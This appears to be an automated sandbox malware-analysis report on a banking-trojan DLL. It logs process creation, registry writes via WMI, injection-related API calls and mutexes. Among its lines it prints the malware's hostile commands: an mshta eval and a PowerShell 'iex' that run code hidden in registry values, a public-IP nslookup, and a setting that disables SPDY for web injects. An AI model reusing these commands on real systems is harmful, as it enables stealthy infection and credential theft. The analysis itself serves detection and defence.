                Source: Yara matchFile source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: control.exe PID: 6752, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY
                Disables SPDY (HTTP compression, likely to perform web injects)Show sources
                Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

                System Summary:

                barindex
                Writes or reads registry keys via WMIShow sources
                Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Writes registry values via WMIShow sources
                Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01111A0B NtMapViewOfSection,
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01111F8C GetProcAddress,NtCreateSection,memset,
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_011115D2 GetLastError,NtClose,LdrInitializeThunk,
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_011123E5 NtQueryVirtualMemory,
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02679E28 NtOpenProcess,LdrInitializeThunk,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_026764BF NtMapViewOfSection,
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02674093 GetProcAddress,NtCreateSection,memset,
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0267B2CD NtQueryVirtualMemory,
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose,
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FCA9D8 NtWriteVirtualMemory,
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FB91C0 NtQueryInformationProcess,
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC1920 NtReadVirtualMemory,
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FB6104 NtQueryInformationProcess,
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FCDE98 NtAllocateVirtualMemory,
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC67C8 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FCD748 NtMapViewOfSection,
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC7B34 NtCreateSection,
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FCEB10 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FE9002 NtProtectVirtualMemory,NtProtectVirtualMemory,
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6E88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose,
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6D91C0 NtQueryInformationProcess,
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA709002 NtProtectVirtualMemory,NtProtectVirtualMemory,
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_011121C4
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0267B0AC
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02678534
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC2A04
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC67C8
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FB932C
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC64DC
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FCC8A8
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC909C
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FB3498
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FCCC80
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FCF06C
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FCCC1C
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FBFDD8
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FD31A4
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FBA1A0
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FD117C
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC096B
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FD654C
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FB8D2C
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC051C
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FD7EDC
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FB7ED8
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC0EC4
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FB4AA0
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FBA6A4
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FBB2A4
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC3A9C
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FD5A88
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC4670
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FC2648
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FB964C
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FD7228
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FCC224
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FD6BDC
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FCF7D4
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FD4FA8
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FB6380
                Source: C:\Windows\System32\control.exeCode function: 32_2_00FB5B40
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6E2A04
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6D932C
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6EF06C
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6ECC80
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6ECC1C
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6E64DC
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6EC8A8
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6E909C
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6D3498
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6E096B
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6F117C
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6F654C
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6D8D2C
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6E051C
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6DFDD8
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6F31A4
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6DA1A0
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6E4670
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6D964C
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6E2648
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6F7228
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6EC224
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6E0EC4
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6F7EDC
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6D7ED8
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6DA6A4
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6DB2A4
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6F5A88
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6D4AA0
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6E3A9C
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6D6380
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6D5B40
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6E67C8
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6F6BDC
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6EF7D4
                Source: C:\Windows\System32\rundll32.exeCode function: 35_2_00000284AA6F4FA8
                Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6536 -s 652
                Source: https___purefile24.top_4352wedfoifom.dllStatic PE information: invalid certificate
                Source: https___purefile24.top_4352wedfoifom.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: xxfxarla.dll.28.drStatic PE information: No import functions for PE file found
                Source: 5ycfw01g.dll.26.drStatic PE information: No import functions for PE file found
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
                Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@47/62@3/2
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0267A648 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8E9E2BBA-2F7E-11EB-90EB-ECF4BBEA1588}.datJump to behavior
                Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{3C647D8B-6BF2-CEE4-D530-CFE2D9647336}
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_01
                Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{347FEBA0-0321-86D2-2DA8-E71AB15C0BEE}
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{30798985-CF3A-E269-D964-73361DD857CA}
                Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{0C917B27-FB18-1E3A-E500-5F32E9340386}
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6536
                Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF479DF3B05A4A00F7.TMPJump to behavior
                Source: https___purefile24.top_4352wedfoifom.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                Source: https___purefile24.top_4352wedfoifom.dllReversingLabs: Detection: 14%
                Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\https___purefile24.top_4352wedfoifom.dll'
                Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6740 CREDAT:17410 /prefetch:2
                Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17410 /prefetch:2
                Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17420 /prefetch:2
                Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:82960 /prefetch:2
                Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP'
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP'
                Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6536 -s 652
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\7849.bi1'
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6740 CREDAT:17410 /prefetch:2
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17410 /prefetch:2
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17420 /prefetch:2
                Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:82960 /prefetch:2
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP'
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP'
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\7849.bi1'
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeProcess created: unknown unknown
                Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
                Source: https___purefile24.top_4352wedfoifom.dllStatic PE information: More than 200 imports for KERNEL32.dll
                Source: https___purefile24.top_4352wedfoifom.dllStatic PE information: More than 200 imports for USER32.dll
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.pdb source: powershell.exe, 00000018.00000002.885294750.000001D7AFBF4000.00000004.00000001.sdmp
                Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
                Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
                Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
                Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
                Source: Binary string: wntdll.pdb source: explorer.exe, 0000001E.00000003.880827092.000000000E420000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
                Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000020.00000002.858769696.000001A77A0DC000.00000004.00000040.sdmp
                Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
                Source: Binary string: shcore.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
                Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
                Source: Binary string: advapi32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.pdbXP source: powershell.exe, 00000018.00000002.885632713.000001D7AFC61000.00000004.00000001.sdmp
                Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.812525782.0000021F71900000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.822200708.00000205DC350000.00000002.00000001.sdmp
                Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
                Source: Binary string: wimm32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
                Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.pdb source: powershell.exe, 00000018.00000002.885294750.000001D7AFBF4000.00000004.00000001.sdmp
                Source: Binary string: sxs.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
                Source: Binary string: \xa.pdb source: powershell.exe, 00000018.00000002.858473846.000001D7ABD53000.00000004.00000001.sdmp
